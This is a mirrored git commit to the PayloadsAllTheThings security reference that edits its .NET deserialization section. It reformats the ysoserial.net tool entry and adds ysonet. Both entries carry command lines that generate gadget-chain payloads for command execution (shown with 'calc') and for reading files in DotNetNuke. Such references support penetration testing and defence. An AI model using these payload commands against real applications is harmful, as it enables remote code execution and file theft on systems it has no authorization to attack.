mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2026-01-06 17:53:28 -08:00
Rounding Errors
This commit is contained in:
@@ -28,14 +28,23 @@ Example: `AAEAAAD/////AQAAAAAAAAAMAgAAAF9TeXN0ZW0u[...]0KPC9PYmpzPgs=`
|
||||
|
||||
## Tools
|
||||
|
||||
* [pwntester/ysoserial.net - Deserialization payload generator for a variety of .NET formatters](https://github.com/pwntester/ysoserial.net)
|
||||
* [pwntester/ysoserial.net](https://github.com/pwntester/ysoserial.net) - Deserialization payload generator for a variety of .NET formatters
|
||||
|
||||
```ps1
|
||||
cat my_long_cmd.txt | ysoserial.exe -o raw -g WindowsIdentity -f Json.Net -s
|
||||
./ysoserial.exe -p DotNetNuke -m read_file -f win.ini
|
||||
./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc" -t
|
||||
./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t
|
||||
```
|
||||
```ps1
|
||||
cat my_long_cmd.txt | ysoserial.exe -o raw -g WindowsIdentity -f Json.Net -s
|
||||
./ysoserial.exe -p DotNetNuke -m read_file -f win.ini
|
||||
./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc" -t
|
||||
./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t
|
||||
```
|
||||
|
||||
* [irsdl/ysonet](https://github.com/irsdl/ysonet) - Deserialization payload generator for a variety of .NET formatters
|
||||
|
||||
```ps1
|
||||
cat my_long_cmd.txt | ysonet.exe -o raw -g WindowsIdentity -f Json.Net -s
|
||||
./ysonet.exe -p DotNetNuke -m read_file -f win.ini
|
||||
./ysonet.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc" -t
|
||||
./ysonet.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t
|
||||
```
|
||||
|
||||
## Formatters
|
||||
|
||||
|
||||
Reference in New Issue
Block a user